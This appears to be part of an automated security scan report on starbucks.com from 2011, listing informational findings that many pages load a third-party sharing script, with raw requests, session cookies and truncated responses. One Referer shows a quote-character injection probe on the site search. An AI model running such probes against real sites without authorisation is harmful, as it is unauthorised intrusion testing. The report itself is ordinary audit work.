Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:07 GMT
Connection: close
Content-Length: 38296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.51. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/starbucks-card-mobile-bb

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /coffeehouse/mobile-apps/starbucks-card-mobile-bb HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:03 GMT
Connection: close
Content-Length: 39299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.52. http://www.starbucks.com/coffeehouse/store-design

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/store-design

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /coffeehouse/store-design HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:55 GMT
Connection: close
Content-Length: 43428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.53. http://www.starbucks.com/coffeehouse/wireless-internet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /coffeehouse/wireless-internet HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:45 GMT
Connection: close
Content-Length: 37834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.54. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet/in-canada

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /coffeehouse/wireless-internet/in-canada HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:49 GMT
Connection: close
Content-Length: 38114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.55. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet/starbucks-digital-network

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /coffeehouse/wireless-internet/starbucks-digital-network HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:51 GMT
Connection: close
Content-Length: 38572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.56. http://www.starbucks.com/customer-service

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /customer-service HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:19:36 GMT
Connection: close
Content-Length: 34642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.57. http://www.starbucks.com/customer-service/contact

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/contact

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /customer-service/contact HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:17 GMT
Connection: close
Content-Length: 37039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.58. http://www.starbucks.com/customer-service/faqs/card

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/card

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /customer-service/faqs/card HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:45 GMT
Connection: close
Content-Length: 87706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.59. http://www.starbucks.com/customer-service/faqs/coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffee

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /customer-service/faqs/coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:05:17 GMT
Connection: close
Content-Length: 37412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.60. http://www.starbucks.com/customer-service/faqs/coffeehouse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffeehouse

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/coffeehouse HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:23 GMT
Connection: close
Content-Length: 59009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.61. http://www.starbucks.com/customer-service/faqs/menu

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/menu

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/menu HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:05:58 GMT
Connection: close
Content-Length: 36954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.62. http://www.starbucks.com/customer-service/faqs/responsibility

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/responsibility

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/responsibility HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:07 GMT
Connection: close
Content-Length: 37177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.63. http://www.starbucks.com/customer-service/faqs/shop

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/shop

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/shop HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:01 GMT
Connection: close
Content-Length: 51544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.64. http://www.starbucks.com/menu

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/search?keywords=%27
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.2.10.1297134218; _chartbeat2=vqos4oan0hnfddev

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:03:26 GMT
Content-Length: 73176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.65. http://www.starbucks.com/menu/catalog/nutrition

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/catalog/nutrition

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/catalog/nutrition?drink=bottled-drinks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:03:53 GMT
Connection: close
Content-Length: 44711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.66. http://www.starbucks.com/menu/drinks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:37 GMT
Connection: close
Content-Length: 62434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.67. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:22 GMT
Connection: close
Content-Length: 39718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.68. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-mocha

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/bottled-frappuccino-mocha

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/bottled-frappuccino-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:02 GMT
Connection: close
Content-Length: 39641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.69. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-vanilla

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/bottled-frappuccino-vanilla

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/bottled-frappuccino-vanilla HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:11 GMT
Connection: close
Content-Length: 39711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
